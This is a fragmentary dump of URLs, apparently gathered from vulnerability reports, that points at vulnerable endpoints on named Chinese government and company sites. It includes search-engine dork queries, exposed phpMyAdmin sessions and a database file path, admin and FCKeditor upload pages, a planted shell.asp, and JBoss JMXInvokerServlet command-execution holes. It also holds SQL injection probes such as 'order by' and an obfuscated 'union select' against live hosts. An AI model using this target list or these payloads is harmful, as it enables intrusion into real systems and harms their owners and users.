http://222.135.76.147:8200/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.127.190:7200/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.149.47:8200/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.59.205.41:8053/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://jwh.tanljgzx.gov.cn/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.171.59:8200/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.56.159.98:8001/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 
http://123.134.189.60:8016/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.56.159.98:8001/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://61.133.119.187:8091/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.76.147:8200/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.127.190:7200/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.149.47:8200/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.59.205.41:8053/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://jwh.tanljgzx.gov.cn/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.171.59:8200/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.56.159.98:8001/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.56.159.98:8001/newsymsum/VillagePersonal2.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 
url:http://www.sdcec.com/site/Search.aspx?op=2 http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemView/DynamicItemView.aspx?CountryName=%E8%92%BF%E6%B3%8A%E7%A4%BE%E5%8C%BA http://222.135.76.147:8200/newsymItemView/DynamicItemView.aspx?CountryName=%E5%90%91%E9%98%B3%E5%9F%A0 http://222.135.127.190:7200/newsymItemView/DynamicItemView.aspx?CountryName=%E5%A4%8F%E5%8D%97%E6%9D%91 http://221.2.149.47:8200/newsymItemView/DynamicItemView.aspx?&CountryName=%E8%99%8E%E5%8F%B0 http://218.59.205.41:8053/newsymItemView/DynamicItemView.aspx?CountryName=%E7%8E%8B%E8%A5%BF http://jwh.tanljgzx.gov.cn/newsymItemView/DynamicItemView.aspx?CountryName=%E6%9E%95%E6%B2%B3%E6%9D%91 http://221.2.171.59:8200/newsymItemView/DynamicItemView.aspx?CountryName=%E8%99%8E%E5%8F%B0 http://221.2.171.59:8200/newsymItemView/DynamicItemView.aspx?CountryName=%E8%99%8E%E5%8F%B0 http://jwh.tanljgzx.gov.cn/newsymItemView/DynamicItemView.aspx?CountryName=%E6%9E%95%E6%B2%B3%E6%9D%91 http://60.217.72.17:7048/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://61.133.119.187:8091/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.76.147:8200/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.127.190:7200/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.149.47:8200/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.59.205.41:8053/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://jwh.tanljgzx.gov.cn/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://jwh.tanljgzx.gov.cn/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 
http://218.59.205.41:8053/ckq/lzjyview.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://www.nongyou.com.cn/ http://61.133.119.187:8091/ckq/pllistOut.aspx?tname=%E8%A5%BF%E8%8B%91%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E8%92%BF%E6%B3%8A%E7%A4%BE%E5%8C%BA http://222.135.76.147:8200/ckq/pllistOut.aspx?tname=%E5%9F%8E%E8%A5%BF%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E5%90%91%E9%98%B3%E5%9F%A0 http://222.135.127.190:7200/ckq/pllistOut.aspx?tname=%E5%9F%8E%E5%8C%BA%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E5%A4%8F%E5%8D%97%E6%9D%91 http://221.2.149.47:8200/ckq/pllistOut.aspx?tname=%E5%9F%A0%E6%9F%B3%E9%95%87&CountryName=%E8%99%8E%E5%8F%B0 http://218.59.205.41:8053/ckq/pllistOut.aspx?tname=%E9%AB%98%E6%96%B0%E5%8C%BA&CountryName=%E7%8E%8B%E8%A5%BF http://jwh.tanljgzx.gov.cn/ckq/pllistOut.aspx?tname=%E5%AE%81%E9%98%B3%E7%BB%8F%E6%B5%8E%E5%BC%80%E5%8F%91%E5%8C%BA&CountryName=%E6%9E%95%E6%B2%B3%E6%9D%91 http://60.217.72.17:7048/ckq/pllistOut.aspx?tname=%E5%9F%A0%E6%9F%B3%E9%95%87&CountryName=%E8%99%8E%E5%8F%B0 http://61.133.119.187:8091/ckq/caiwgkview.aspx?tname=%E8%A5%BF%E8%8B%91%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E8%92%BF%E6%B3%8A%E7%A4%BE%E5%8C%BA http://222.135.76.147:8200/ckq/caiwgkview.aspx?tname=%E5%9F%8E%E8%A5%BF%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E5%90%91%E9%98%B3%E5%9F%A0 http://222.135.127.190:7200/ckq/caiwgkview.aspx?tname=%E5%9F%8E%E5%8C%BA%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E5%A4%8F%E5%8D%97%E6%9D%91 http://221.2.149.47:8200/ckq/caiwgkview.aspx?tname=%E5%9F%A0%E6%9F%B3%E9%95%87&CountryName=%E8%99%8E%E5%8F%B0 http://218.59.205.41:8053/ckq/caiwgkview.aspx?tname=%E9%AB%98%E6%96%B0%E5%8C%BA&CountryName=%E7%8E%8B%E8%A5%BF http://jwh.tanljgzx.gov.cn/ckq/caiwgkview.aspx?tname=%E5%AE%81%E9%98%B3%E7%BB%8F%E6%B5%8E%E5%BC%80%E5%8F%91%E5%8C%BA&CountryName=%E6%9E%95%E6%B2%B3%E6%9D%91 http://60.217.72.17:7048/ckq/caiwgkview.aspx?tname=%E9%AB%98%E6%96%B0%E5%8C%BA&CountryName=%E7%8E%8B%E8%A5%BF 
http://61.133.119.187:8091/newsymItemView/DynamicItemViewOut.aspx?tname=%E8%A5%BF%E8%8B%91%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E8%92%BF%E6%B3%8A%E7%A4% http://222.135.76.147:8200/newsymItemView/DynamicItemViewOut.aspx?tname=%E5%9F%8E%E8%A5%BF%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E5%90%91%E9%98%B3%E5%9F%A0 http://222.135.127.190:7200/newsymItemView/DynamicItemViewOut.aspx?tname=%E5%9F%8E%E5%8C%BA%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E5%A4%8F%E5%8D%97%E6%9D%91 http://221.2.149.47:8200/newsymItemView/DynamicItemViewOut.aspx?tname=%E5%9F%A0%E6%9F%B3%E9%95%87&CountryName=%E8%99%8E%E5%8F%B0 http://218.59.205.41:8053/newsymItemView/DynamicItemViewOut.aspx?tname=%E9%AB%98%E6%96%B0%E5%8C%BA&CountryName=%E7%8E%8B%E8%A5%BF http://jwh.tanljgzx.gov.cn/newsymItemView/DynamicItemViewOut.aspx?tname=%E5%AE%81%E9%98%B3%E7%BB%8F%E6%B5%8E%E5%BC%80%E5%8F%91%E5%8C%BA&CountryName=%E6%9E% http://60.217.72.17:7048/newsymItemView/DynamicItemViewOut.aspx?tname=%E9%AB%98%E6%96%B0%E5%8C%BA&CountryName=%E7%8E%8B%E8%A5%BF http://61.133.119.187:8091/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.76.147:8200/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.127.190:7200/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.149.47:8200/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.59.205.41:8053/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://jwh.tanljgzx.gov.cn/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 
http://221.2.171.59:8200/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.56.159.98:8001/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.149.47:8200/ckq/pllistOut.aspx?tname=%E5%9F%A0%E6%9F%B3%E9%95%87&CountryName=%E8%99%8E%E5%8F%B0 http://61.133.119.187:8091/ckq/caiwgkview.aspx?tname=%E8%A5%BF%E8%8B%91%E5%8A%9E%E4%BA%8B%E5%A4%84&CountryName=%E8%92%BF%E6%B3%8A%E7%A4%BE%E5%8C%BA http://218.59.205.41:8053/newsymItemView/DynamicItemViewOut.aspx?tname=%E9%AB%98%E6%96%B0%E5%8C%BA&CountryName=%E7%8E%8B%E8%A5%BF http://jwh.tanljgzx.gov.cn/newsymsum/VillagePersonalView.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 inurl:nlview.aspx?tname= http://221.2.149.47:8200/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://123.134.189.60:8022/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.56.40.229:8045/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.58.124.131:8003/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://jwh.tanljgzx.gov.cn/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.109.70:8200/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.76.147:8200/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84 
http://111.17.169.213:801/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://218.59.205.41:8053/ckq/nlview.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://220.181.186.70/cshop/login/login.do http://121.207.251.153/ at.qq.com/js/page/pagecommon.js http://**.**.**/phpmyadmin/_ http://**.**.**/phpmyadmin/index.phptoken=74c16905d99310a87839c3088bdb5b9e_ http://**.**.**/phpmyadmin/index.phptoken=8e7e7fa8b8da563793db7b36c9a62441_ http://**.**.**/phpmyadmin/index.phptoken=f005407f5f7fb388d8596c30622e1f2f_ http://**.**.**/phpmyadmin/index.phptoken=95ffffbba1240da8684620e4edebdd6a_ http://**.**.**/phpmyadmin/index.phptoken=6b228cc9c5c8e72ec01407a140ce2d6e_ http://**.**.**/phpmyadmin/index.phptoken=2ac5f360d1bd393cb8e0de9d74889964_ http://**.**.**/phpmyadmin/index.phptoken=bac890cff4f15341686fa932ccf28d7b_ http://**.**.**/phpmyadmin/index.phptoken=21da468bccd5afda68248bc9abee53c5_ http://**.**.**/phpmyadmin/index.phptoken=dcf623b19fc1a2324b398f08ab2faa8e_ http://**.**.**/phpmyadmin/index.phptoken=2c19c053649eda9cc126f29b3a3a7e4b_ http://**.**.**/phpmyadmin/index.phptoken=3691193c61c6d16fc8383d07fce9d38d_ http://**.**.**/phpmyadmin/index.phptoken=a9a02fd8db60449f7754f6e247f7e0b7_ http://**.**.**/phpmyadmin/index.phptoken=8c9fa011d2c3a917273e4f6214469f86_ http://**.**.**/phpmyadmin/index.phptoken=294b253d780ed75a78df6e16d02e8acb_ http://**.**.**/phpmyadmin/index.phptoken=2e37bb749f11226eae66618a711cc808_ http://**.**.**/phpmyadmin/index.phptoken=34646922033c08b4354722eb14624ccd_ http://**.**.**/phpmyadmin/index.phptoken=5c6ab6bd36f5177899e52d9dce71cebf_ http://**.**.**/phpmyadmin/index.phptoken=2527227a2474529f3d1405b2a8fda79a_ http://**.**.**/phpmyadmin/index.phptoken=fe3831b03ef1fd80cda7fc41e30b5247_ http://**.**.**/phpmyadmin/index.phptoken=f06db5ed7e3af3acc627213b3cff14d0_ 
http://**.**.**/phpmyadmin/index.phptoken=b8e8687887de29750c2824c0ce4cf61a_ http://**.**.**/phpmyadmin/index.phptoken=8c34264c30ce6417da635b6bb2ca4a01_ http://**.**.**/phpmyadmin/index.phptoken=ee75717dddb932fbb70ae086afb2f223_ http://**.**.**/phpmyadmin/index.phptoken=c481899a64eb682cd93593713a986c4e_ http://**.**.**/phpmyadmin/index.phptoken=7f0bf928e44ea8e2d14b3eba10761f18_ http://**.**.**/phpmyadmin/index.phptoken=aedbb4459ceb06adcb7a342cab5be287_ http://**.**.**/phpmyadmin/index.phptoken=abf50c6d7ee02489d733c80e7af0d6a7_ http://**.**.**/phpmyadmin/index.phptoken=5d895e2e76b09b9f99a53f4e93a54f37_ http://**.**.**/phpmyadmin/index.phptoken=619db76407ffe9ac378d036146833a12_ http://**.**.**/phpmyadmin/index.phptoken=c1a5e0ce2f35b67f1bb8eef0abf5efcd_ http://**.**.**/phpmyadmin/index.phptoken=7f655995be602ff73d945ec6f393a56e_ http://**.**.**/phpmyadmin/index.phptoken=77e3c1cfda3a7e3fdd2d46b3fe5ffe36 http://211.149.151.147/phpmyadmin/info.php http://www.sdzzcz.gov.cn/db/#fgfdszfasad#.mdb http://www.sdzzcz.gov.cn/admin/default.asp http://www.hlsafety.gov.cn/ www.ctce.com.cn http://www.gxgxw.gov.cn/ http://www.gxgxw.gov.cn/CommunicateOnNet/Suggestions/SuggestionAdd.aspx?topicId=3 http://210.75.193.31/main.jsp http://202.108.65.185:8082/js/attention/test.jsp URL:/servlet/kbedit?did=-1 cn:8080/servlet/kbedit?did=-1 http://stgov.my.gov.cn:8080/servlet/kbedit?did=-1 http://egov.pzhzw.gov.cn:8080/servlet/kbedit?did=-1 http://egov.scsn.gov.cn:8080/servlet/kbedit?did=-1 http://egov.zgzw.gov.cn:8080/servlet/kbedit?did=-1 cn:8080/servlet/kbview?qid=-1 cn:8080/servlet/kbedit?qid=-1 http://stgov.my.gov.cn:8080/servlet/kbview?qid=-1 http://stgov.my.gov.cn:8080/servlet/kbedit?qid=-1 http://egov.pzhzw.gov.cn:8080/servlet/kbview?qid=-1 http://egov.pzhzw.gov.cn:8080/servlet/kbedit?qid=-1 http://egov.scsn.gov.cn:8080/servlet/kbview?qid=-1 http://egov.scsn.gov.cn:8080/servlet/kbedit?qid=-1 http://egov.zgzw.gov.cn:8080/servlet/kbview?qid=-1 
http://egov.zgzw.gov.cn:8080/servlet/kbedit?qid=-1 http://202.108.65.99/ http://www.ysan.com.cn/ http://www.xxxx.com/admin www.xxx.com www.xxx.com/admin http://www.ysan.com.cn/admin http://www.wzdiao.com/admin/ http://www.jymyms.com/admin/ http://www.jshypj.com/admin/ http://www.tianyuemotor.com/admin/ http://www.dgytblg.com/admin/ http://www.dgmxcy.com/admin http://www.wzlsjy.com/admin/ http://www.lzctkj.com/admin http://www.njlujia.com/admin http://www.szhsddz.net/admin/ http://www.jyhongfa.com/admin/ http://www.jydyy.com/admin/ http://www.jnhlsy.com/admin/ http://www.shhgzs.com/admin/ http://www.rrkfw.com/admin/ http://www.jinhuayuegx.com/admin http://www.shuntaijt.cn/admin/ http://www.xztrh.com/admin/ http://www.xmshetu.com/admin/ http://www.szxyclp.com/admin/ URL:/servlet/kbdelquestion?qids=1&deptIds=null cn:8080/servlet/kbdelquestion?qids=1&deptIds=null http://stgov.my.gov.cn:8080/servlet/kbdelquestion?qids=1&deptIds=null http://egov.my.gov.cn:8080/servlet/kbdelquestion?qids=1&deptIds=null http://egov.scsn.gov.cn:8080/servlet/kbdelquestion?qids=1&deptIds=null http://egov.zgzw.gov.cn:8080/servlet/kbdelquestion?qids=1&deptIds=null http://edit.mapabc.com www.53kf.com www.53kf.com http://app.home.ifeng.com/index.php/home/search?keyword=%27 http://scm.tmt.tcl.com/fckeditor/_samples/default.html http://php.tsearthquake.sina.com.cn/addok.php http://www.cnoocsafety.com/admin/index.html http://221.2.149.47:8200/newSymSum/VillagePersonal.aspx?tname=%e5%af%bb%e5%b1%b1%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e5%af%bb%e5%b1%b1%e6%9d%91 http://111.17.169.213:801/newSymSum/VillagePersonal.aspx?tname=%e5%82%85%e5%ae%b6%e9%95%87&CountryName=%e5%b0%8f%e7%94%b0%e6%9d%91 http://218.56.40.229:8045/newSymSum/VillagePersonal.aspx?tname=%e9%bb%84%e5%8a%a1%e8%a1%97%e9%81%93%e5%8a%9e&CountryName=%e5%bc%a0%e5%ae%b6%e5%b1%85%e6%b0%91%e5%8c%ba 
http://222.135.76.147:8200/newSymSum/VillagePersonal.aspx?tname=%e5%9f%8e%e8%a5%bf%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e6%b2%bd%e6%b3%8a%e5%a7%9a%e5%ae%b6 http://222.135.109.70:8200/newSymSum/VillagePersonal.aspx?tname=%e5%ae%8b%e6%9d%91%e9%95%87&CountryName=%e5%8f%b0%e4%b8%8a%e6%9d%91 http://218.59.205.41:8053/newSymSum/VillagePersonal.aspx?tname=%e5%ae%89%e4%b8%b4%e7%ab%99%e9%95%87&CountryName=%e8%91%9b%e5%ae%b6%e5%8f%b0 http://123.134.189.60:8022/newSymSum/VillagePersonal.aspx?tname=%e5%87%a4%e5%9f%8e%e8%a1%97%e9%81%93%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%91%a3%e8%8a%b1%e5%9b%ad%e7%a4%be%e5%8c%ba http://jwh.tanljgzx.gov.cn/newSymSum/VillagePersonal.aspx?tname=%e8%b0%b7%e9%87%8c%e9%95%87&CountryName=%e5%b0%8f%e5%be%90%e5%ba%84%e6%9d%91 http://qhserm.cnooc.com.cn、http://qhserm.cnooc.com.cn:8081、http://qhserm.cnooc.com.cn:8082,jboss后台均未未删除invoker/JMXInvokerServlet导致命令执行漏洞。 url:http://qhserm.cnooc.com.cn,存在invoker/JMXInvokerServlet导致命令执行漏洞,如下: url:http://qhserm.cnooc.com.cn:8081,存在invoker/JMXInvokerServlet导致命令执行漏洞,如下: url:http://qhserm.cnooc.com.cn:8081,存在invoker/JMXInvokerServlet导致命令执行漏洞,如下: http://www.cndns.com/cn/database/sql_frm_getgift_hst.asp?gid=dxnet_mssql150&pstrotprd=sxnetqyy500_1302&pstrotnme=********&pstrotyrs=3&pstcolumn=pstprd2&sqlcheck=2 inurl:i.php?id= http://www.htime.com.cn/i.php?id=7 http://www.huangxinhua.com/i.php?id=4 url:https://122.144.130.98/ https://122.144.130.98/adminscreens/pblsh_data_screen.aspx https://122.144.130.98/adminscreens/prg_data_screen.aspx https://122.144.130.98/userscreens/dwnld_data_screen.aspx https://122.144.130.98/adminscreens/data_type_list.aspx https://122.144.130.98/adminscreens/env_list.aspx https://122.144.130.98/adminscreens/group_list.aspx https://122.144.130.98/adminscreens/user_edit.aspx http://www.cnoocqcs.com/shell.asp http://www.muyingzhijia.com/test.aspx http://biji.baidu.com/inotes/page/publicnew?key=Ym9vays3MzM3MjQ= http://m.jqbar.com/admin/Login.aspx 
http://www.wine.cn/index.php/Grandcru/detail/g_id/3 http://61.153.213.10/szxy/logon.action http://club.bydauto.com.cn/plugin.php?id=suggest http://www.gzyhg.com/pro.aspx http://www.hhgrd.gov.cn/fckeditor/editor/fckeditor.html http://www.zyxhyj.com/fckeditor/editor/fckeditor.html http://www.mtxqxj.com/fckeditor/editor/fckeditor.html http://www.mtrdb.gov.cn/fckeditor/editor/fckeditor.html http://rhsdszx.com/fckeditor/editor/fckeditor.html http://www.wczzxrmyy.com/fckeditor/editor/fckeditor.html http://zysez.cn/fckeditor/editor/fckeditor.html http://www.lzchaye.com/fckeditor/editor/fckeditor.html http://www.bjzznfz.com/fckeditor/editor/fckeditor.html http://cn.zgldmz.cn//fckeditor/editor/fckeditor.html http://www.gzztgs.com/fckeditor/editor/fckeditor.html http://www.zaxyy.com/fckeditor/editor/fckeditor.html http://www.zggldyx-pz.com/fckeditor/editor/fckeditor.html http://www.mtrdb.gov.cn/fckeditor/editor/fckeditor.html http://www.siteserver.cn/ http://www.picooc.com/picooc/interface/ http://www.picooc.com/picooc/interface/ http://www.picooc.com/picooc/interface/ http://www.51etong.com http://www.epg.huan.tv/default/index# http://www.tjsjjjc.gov.cn/index.html http://ui.letv.com/home.php?mod=space&uid=45236480&do=album&picid=8212 inurl:Y01/ws_xw/info.asp http://www.ybga.gov.cn/ybzgaj/Y01/ws_xw/info.asp?mkbh=M001004 http://www.ybztz.gov.cn/Y01/ws_xw/info.asp?mkbh=M007005 http://www.ybxfj.gov.cn/Y01/ws_xw/info.asp?mkbh=M004001 http://www.ybzhbj.gov.cn/Y01/ws_xw/info.asp?mkbh=M004001 http://www.dhjsj.gov.cn/jsj/Y01/ws_xw/info.asp?mkbh=M004001 http://www.atxga.com/Y01/ws_xw/info.asp?mkbh=M002001 http://www.xy1957.com/y01/ws_xw/info.asp?mkbh=M003001 http://www.dirui.com.cn/Y01/ws_xw/info.asp?mkbh=M001002 http://www.yjbhdl.com/Y01/ws_xw/info.asp?mkbh=M006001 http://www.ybzw.net/Y01/ws_xw/info.asp?mkbh=M004001 http://www.123555.net/Y01/ws_xw/info.asp?mkbh=M004001 http://www.dhsyzx.cn/Y01/ws_xw/f01_info.asp?mkbh=M009001 http://www.dbysjy.com/Y01/ws_xw/info.asp?mkbh=M001002 
http://yballvideo.com/Y01/ws_xw/info.asp?mkbh=M002010 http://www.yongzhenfood.com/cn/Y01/ws_xw/info.asp?mkbh=M003001 http://sysmed.cn/china/Y01/ws_xw/info.asp?mkbh=M004001 http://www.jladly.com/Y01/ws_xw/info.asp?mkbh=M006002 http://www.dan-hua.com/cn/Y01/ws_xw/info.asp?mkbh=M004001 http://www.yjweiye.net/Y01/ws_xw/info.asp?mkbh=M001002 http://www.ybyingchi.com/Y01/ws_xw/f03_info.asp?mkbh=M005001 http://www.ybdf.com/www/Y01/ws_xw/info.asp?mkbh=M005003 http://www.ybdadi.com/ybdadi/Y01/ws_xw/info.asp?mkbh=M003001 http://www.caoxianyy.com/cxyy/Y01/ws_xw/info.asp?mkbh=M002001 http://www.yjggqc.com/gjgs/Y01/ws_xw/info.asp?mkbh=M002001 http://www.ybcyyy.net/cyyy/Y01/ws_xw/info.asp?mkbh=M006001 http://www.hebbeilin.com/Y01/ws_xw/info.asp?mkbh=M011007 http://ybczkj2.bjsx30.host.35.com/ybczkj/Y01/ws_xw/info.asp?mkbh=M007001 http://ybczkj2.bjsx30.host.35.com/ybczkj/Y01/ws_xw/info.asp?mkbh=M007001 http://sqlmap.org http://202.108.65.166:8080/ http://t.cntv.cn/?m=api/weibo/action.createFriendship&_=142288703327 display:none!important;display:block;width=0;height=0 display:none!important;display:block;width=0;height=0 http://118.244.158.17:81/DataEdit/AddAuthenType http://118.244.158.17:81/DataEdit/AddIndustry http://118.244.158.17:81/DataEdit/AddScene http://118.244.158.17:81/DataEdit/AddScheme http://www.hzdzj.com/detail.php?title=%B9%AB%B8%E6%C0%B8&id=218&xh=3 http://112.64.196.70:8080/spiderppg/web/index.html http://218.30.99.201/rivues/login.html http://star.finance.ifeng.com/stock/historyReport/?stockCode=sz300041 http://116.255.148.4/UploadFile/635139019915781250.txt http://www.53kf.com/index.php?fromurl=other&controller=union_mall&action=goshop&sid=1052 http://www.53kf.com/index.php?fromurl=other&controller=union_mall&action=goshop&sid=1052%20order%20by%2011 http://www.53kf.com/index.php?fromurl=other&controller=union_mall&action=goshop&sid=1052%20order%20by%2012 http://www.smartcome.com/forum.php?mod=viewthread&tid=1/*111*/union%20select%201%20from/*123*/dual--%201 
